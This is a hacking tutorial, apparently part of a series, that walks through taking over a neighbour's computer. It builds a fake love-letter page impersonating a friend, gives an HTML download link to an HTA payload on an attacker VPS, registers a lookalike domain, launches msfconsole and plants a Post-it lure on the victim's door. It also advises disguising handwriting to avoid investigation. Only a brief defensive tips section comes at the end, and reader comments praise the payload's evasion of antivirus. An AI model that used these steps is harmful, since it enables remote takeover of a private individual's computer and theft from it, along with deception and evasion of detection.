Now that we have our payload hosted on our VPS, as well as Metasploit installed, we can begin developing the webpage which will trick our "John Smith" target into opening our malicious file. Once he has, we can take over his computer.
This part is more involved, but the first task will be to create a website with a page that John will see. Crafting a convincing social engineering page is vital to the success of the attack, and we know our target well, so it shouldn't be too hard.
Next, we'll embed the payload we created and hosted on our VPS in the previous guide. We'll make the payload a downloadable "video" file on the social engineering page. But this won't work at all without a convincing website name, so registering a domain name is next. We'll register a website named after our victim ("john-smith.com) and forward those requests to our social engineering page.
For the final act, we'll learn when and how to strategically deliver the Post-it note to our victim, get a reverse shell on his computer, and beginning working our magic with Metasploit to own everything on his system. But this lesson wouldn't be complete unless we also talked about ways that you could prevent yourself from falling victim to such an elaborate attack, so let's get to it!
Step 1: Create a Website
It's time now to create the webpage our victim, John Smith, will see when he visits our website. There are a number of ways we can create websites for free. Below are just a few available options.
All of these websites are suitable choices. If you have experience with any of them or similar sites, feel free to use whichever website you're most comfortable with. Tumblr is one of the most popular websites in the world, so there's a good chance readers have used their services in the past to create websites. It's also very easy and intuitive to use. For that reason, I'll be demonstrating how to create a simple website using Tumblr.
To start using Tumblr, head over to their registration page to create an account. Signing up is free and only requires an email address. Be sure to check your email and click the email verification link Tumblr sends you; Verifying your email is required to start creating a website.
When that's done, click on the "Account" button in the top-right corner, then click on the "Settings" button in the drop-down menu.
In the column on the right side, click on the "Untitled" blog to view the blog settings. If there is no "Untitled" blog, simply click on the "Create a new blog" button to create one. From there, click on the "Edit theme" button to customize the look of our website. In the top-left corner, you'll find the "Edit HTML" button.
The appearance of this website should be extremely personalized to the person you're targeting. As a generic example for this tutorial, I'll recreate this random love letter I found online. John Smith will read this letter and believe the person who left the sticky note on his apartment door is confessing their secret love for him. I'll also sign the love letter as a coworker or friend I was able to identify by viewing John's social media feeds. John's best friend is named "Susan Headley."
I spent a lousy 10 minutes editing the HTML here. In a real scenario, it would be beneficial to spend more time crafting this page in a way that invokes some positive emotion in your victim. We generally don't want to scare or alarm the person we're targeting. Putting someone in a cautious or fearful mindset will only make them suspicious of any files we ask them to download and open. This webpage has to be believable enough for our victim to continue reading and ultimately make it to the end of the letter.
Clicking the "video of me" link will produce the video-of-me.hta payload we created in the previous article in this series. How you actually name the file is up to you.
Let's now take a look at how we link to our HTA payload on the VPS and make it accessible to our victim.
Step 2: Embed the Payload
We need to ensure our HTA payload can be easily downloaded by our victim from our social engineering webpage. Below is some simple HTML we'll use to create a link to resources on other servers.
Using the below HTML, we can create a download link to the HTA payload file being hosted by the Python3 server we set up in the previous guide.
<a href="http://Your-Server-IP-Address/video-of-me.hta">convincing text here</a>
That's it. Be sure to click "Update Preview" and "Save" in the Tumblr HTML editor.
Step 3: Get a Custom Domain Name (Optional)
It may be possible to use the default Tumblr URL and still have success with tricking our victim into visiting "john-smith.tumblr.com." However, using a Tumblr URL might arouse suspicion in our target and cause our attack to fail. It would be in the best interest of the attack to use a fully unique domain name.
There are many services online which we can use to register custom domains. With Dot.tk, we can create custom domain names for free. Dot.tk only requires an email address to use.
To begin registering a domain name with Dot.tk, simply type your desired domain name into the "Check Availability" bar.
We'll be presented with several domains that are completely free, including .tk, .ml, and .ga, which might be unusual to some. If you wish to register a .com or a .net, scroll down a bit to view the available premium domains. Paid domains on Dot.tk start at around $4.
When you've decided on a domain, click the "Get it now!" button on the right side of the domain you wish to register. Then, click on the "Checkout" button that appears in the top-right corner.
From there, you'll be redirected to their signup page where you'll need to enter a valid email address. Dot.tk will send you a verification email with an activation link. Click on the activation link to register your email address. Next, you'll be redirected to the domain name checkout page. Click the "Forward this domain" button, and enter the URL of the Tumblr page we created in Step 1.
Click on the "Continue" button after entering your Tumblr URL to complete the domain name registration process. That's it! After a few minutes, visiting "john-smith.tk" in any browser will redirect to the social engineering page we set up earlier.
With your website ready to go, it's time to start Metasploit. SSH into your VPS and use the below command with the -r argument and the "unicorn.rc" file we created in the previous guide. This will automate the Metasploit msfconsole configuration.
msfconsole -r /path/to/unicorn.rc
Step 4: Deliver the Post-It Note
Finally, it's time to talk about strategically delivering the Post-it note to our intended victim. The goal is to place the sticky note where your target is most likely to see it. Depending on your building, this may be as simple as stepping out of your apartment in pajamas and placing it at eye-level on your neighbor's apartment door.
If you live in a rural area and can easily be seen approaching your neighbor's house, you may have to do it at an hour when everyone in your neighbor is likely away at work or asleep. You might also consider using a reliable piece of tape to keep the Post-it from being blown off your neighbor's door by a strong gust of wind. Fortunately, if you get caught approaching your neighbor's house, Post-it notes are small enough to crumple up in your hand without anyone noticing.
In the first part of this series, I mentioned this kind of social engineering trick can be used to target employees in corporate settings. Post-it notes are extremely common and easy to find in office environments. Delivering a Post-it note for your intended victim could be as trivial as placing it on their computer screen, in their mailbox, or directly on their office phone.
Just be careful to obscure your handwriting when creating the Post-it note. If the victim realizes they're being targeted, an investigation might be opened and it would be possible to correlate the handwriting on the sticky note back to you.
Step 5: Post-Exploitation with Msfconsole
When our victim opens the HTA payload on their computer, the reverse TCP connection will establish back on our VPS, allowing for remote access to our victim's computer. Below is what a newly established connection looks like using msfconsole.
Our simple HTA payload won't grant you admin privileges, so you'll have to work a bit to escalate if you want to make significant changes to the target device. Users new to Metasploit and msfconsole may find our guides on Meterpreter hacking scripts and Meterpreter commands useful.
How to Protect Yourself
There are quite a few unsettling and creepy aspects to this hack. In the first part of this series, we talked about using people search engines and actively monitoring device activity on wireless networks where permission to do so was not explicitly granted to us.
The reality is that anyone with a $30 computer can do most (if not all) of the steps of this hack. Anyone could be gathering public information about you right now and preparing to social engineer you into visiting a website they control. Instead of shying away from articles like this, let's better understand how these attacks work so that we can prepare ourselves should we ever become the intended victim.
- If you have an unnecessary amount of social media accounts, delete as many of them as possible. There's a good chance you're publicly divulging too much about yourself online.
- Don't over-share personal information when using accounts online. Avoid sharing information about where you live, where you work, and where you are.
- Spoofing hardware MAC addresses when connecting to Wi-Fi networks may help prevent targeted attacks. If your attacker believes you're using a MacBook and not a Windows computer, any MacBook-specific payloads you're tricked into opening won't work in a Windows environment.
- To further conceal outsiders from learning what kinds of devices are used in your home, use Ethernet to access the internet instead of Wi-Fi. Devices connecting to the router via Ethernet cable will not appear in airodump-ng attacks.
- Don't visit random websites. If you receive a letter, text, email, or any delivery of a strange website and you cannot verify the sender — don't visit the website.
- Don't open strange files with unusual file type extensions, especially not from a computer which contains personal or sensitive information.
Until next time, you can find me on the darknet.
Just updated your iPhone? You'll find new emoji, enhanced security, podcast transcripts, Apple Cash virtual numbers, and other useful features. There are even new additions hidden within Safari. Find out what's new and changed on your iPhone with the iOS 17.4 update.
4 Comments
Wow fantastic, undetected by Chrome and almost undetected by Windows 10.
Hey Patrick. Thanks, I'm glad you enjoyed the article. I'm sure there were hundreds of HTA payloads uploaded to VirusTotal since publishing the article. It's certainly probable the Windows and VT detection rates will increase over time. Feel free to substitute the HTA method in this article with your preferred payload method.
Wow this has been one of my favorite tutorials I've read so far! Very well done sir :D
How to realise this attack without to use a vps
Share Your Thoughts